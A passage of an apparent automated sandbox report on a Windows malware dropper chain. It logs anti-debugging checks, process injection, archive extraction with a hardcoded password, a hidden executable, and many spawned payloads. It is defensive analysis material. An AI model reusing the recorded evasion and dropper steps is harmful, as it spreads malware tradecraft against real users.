                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Windows\explorer.exeProcess queried: DebugPort
                        Source: C:\Windows\explorer.exeProcess queried: DebugPort
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04AC0C8E rdtsc 0_2_04AC0C8E
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B966A8 GetCurrentProcess,GetProcessTimes,memset,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,fputs,12_2_00B966A8
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069652B mov eax, dword ptr fs:[00000030h]0_2_0069652B
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069A302 mov eax, dword ptr fs:[00000030h]0_2_0069A302
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_009FA302 mov eax, dword ptr fs:[00000030h]2_2_009FA302
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_009F652B mov eax, dword ptr fs:[00000030h]2_2_009F652B
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_009FA302 mov eax, dword ptr fs:[00000030h]3_2_009FA302
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_009F652B mov eax, dword ptr fs:[00000030h]3_2_009F652B
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeCode function: 5_2_000E645B mov eax, dword ptr fs:[00000030h]5_2_000E645B
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeCode function: 5_2_000EA1C2 mov eax, dword ptr fs:[00000030h]5_2_000EA1C2
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_0066A1C2 mov eax, dword ptr fs:[00000030h]6_2_0066A1C2
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_0066645B mov eax, dword ptr fs:[00000030h]6_2_0066645B
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_0066A1C2 mov eax, dword ptr fs:[00000030h]8_2_0066A1C2
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_0066645B mov eax, dword ptr fs:[00000030h]8_2_0066645B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeProcess token adjusted: Debug

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeNtDeviceIoControlFile: Indirect: 0x1F058B02B9D
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeNtEnumerateValueKey: Indirect: 0x1F058B0293D
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeNtEnumerateKey: Indirect: 0x1D188C72842
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeNtEnumerateKey: Indirect: 0x1D188C72875
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeNtResumeThread: Indirect: 0x1F058B0231E
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeNtQuerySystemInformation: Indirect: 0x1D188C7205D
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeNtQuerySystemInformation: Indirect: 0x18B0B5A205D
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeNtEnumerateValueKey: Indirect: 0x1F058B0290E
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeNtResumeThread: Indirect: 0x1D188C7231E
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeNtEnumerateKey: Indirect: 0x18B0B5A2842
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeNtEnumerateKey: Indirect: 0x18B0B5A2875
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeNtEnumerateKey: Indirect: 0x1F058B02842
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeNtEnumerateKey: Indirect: 0x1F058B02875
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeNtEnumerateValueKey: Indirect: 0x1D188C7293D
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeNtEnumerateValueKey: Indirect: 0x18B0B5A293D
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeNtEnumerateValueKey: Indirect: 0x1D188C7290E
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeNtEnumerateValueKey: Indirect: 0x18B0B5A290E
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeNtDeviceIoControlFile: Indirect: 0x1D188C72B9D
                        Source: C:\Program Files\Windows Media Player\graph\graph.exeNtQuerySystemInformation: Indirect: 0x1F058B0205D
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeMemory written: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 7840 base: 140000000 value: 4D
                        Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 7840 base: 140001000 value: 40
                        Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 7840 base: 1402DD000 value: 58
                        Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 7840 base: 14040B000 value: A4
                        Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 7840 base: 140739000 value: 00
                        Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 7840 base: 14075E000 value: 48
                        Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 7840 base: 14075F000 value: 48
                        Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 7840 base: 140762000 value: 48
                        Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 7840 base: 140764000 value: 00
                        Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 7840 base: 140765000 value: 00
                        Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 7840 base: AE1010 value: 00
                        Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeThread register set: target process: 7840
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe "C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe "C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe "C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe "C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe "C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe "C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe "C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe "C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeProcess created: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe "C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                        Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeProcess created: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe "C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeProcess created: unknown unknown
                        Source: file.exe, 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.268897936449.0000000000C03000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Program Manager
                        Source: axplong.exe, axplong.exe, 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: :dProgram Manager
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B9D690 cpuid 12_2_00B9D690
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015130001\EkmIhQM.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015130001\EkmIhQM.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015193001\K6UAlAU.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015193001\K6UAlAU.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015216001\wOKhy9f.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015216001\wOKhy9f.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015305001\94CwbGg.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015305001\94CwbGg.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome\Cipher VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\Cryptodome VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\certifi VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\importlib_metadata-8.0.0.dist-info VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\importlib_metadata-8.0.0.dist-info VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\wheel-0.43.0.dist-info VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\wheel-0.43.0.dist-info VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\wheel-0.43.0.dist-info VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\wheel-0.43.0.dist-info VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002 VolumeInformation
